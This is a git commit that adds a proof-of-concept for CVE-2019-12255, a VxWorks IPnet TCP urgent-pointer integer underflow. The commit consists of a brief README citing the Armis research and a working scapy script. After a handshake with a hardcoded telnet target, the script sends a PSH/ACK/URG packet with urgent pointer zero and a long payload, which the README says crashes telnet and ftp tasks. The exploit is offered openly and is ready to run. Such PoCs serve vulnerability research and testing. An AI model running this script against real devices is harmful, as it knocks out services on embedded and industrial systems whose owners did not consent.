add CVE-2019-12255

PSoul · Aug 11, 2019 · 9c6e603 · 9c6e603
1 parent 5e9c273
commit 9c6e603
Showing 4 changed files with 30 additions and 0 deletions.
diff --git a/CVE-2019-12255/README.md b/CVE-2019-12255/README.md
@@ -0,0 +1,11 @@
+## CVE-2019-12255
+VxWorks TCP Urgent pointer = 0 integer underflow 
+
+## Discovered By
+Armis Security
+
+## Vulnerability Summary
+The vulnerability exists in the IPnet stack of VxWorks. The details of the vulnerability can be found [here](https://i.blackhat.com/USA-19/Thursday/us-19-Seri-Critical-Zero-Days-Remotely-Compromise-The-Most-Popular-Real-Time-OS-wp.pdf). The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc.
+![ftp crash](crash_ftp.png)
+
+![telnet crash](crash_telnet.png)
diff --git a/CVE-2019-12255/crash_ftp.png b/CVE-2019-12255/crash_ftp.png
diff --git a/CVE-2019-12255/crash_telnet.png b/CVE-2019-12255/crash_telnet.png
diff --git a/CVE-2019-12255/poc.py b/CVE-2019-12255/poc.py
@@ -0,0 +1,19 @@
+from scapy.all import *
+
+if __name__ == "__main__":
+    ip = "192.168.10.199"
+    dport = 23
+    seq_num = 1000
+    payload = "\x42"*2000
+    sport = random.randint(1024,65535)
+
+    syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num)
+    syn_ack = sr1(syn)
+
+    seq_num = seq_num + 1
+    ack_num = syn_ack.seq+1
+    ack = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "A", seq=seq_num, ack=ack_num)
+    send(ack)
+
+    psh = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "PAU", seq=seq_num, ack=ack_num, urgptr=0) / payload
+    send(psh)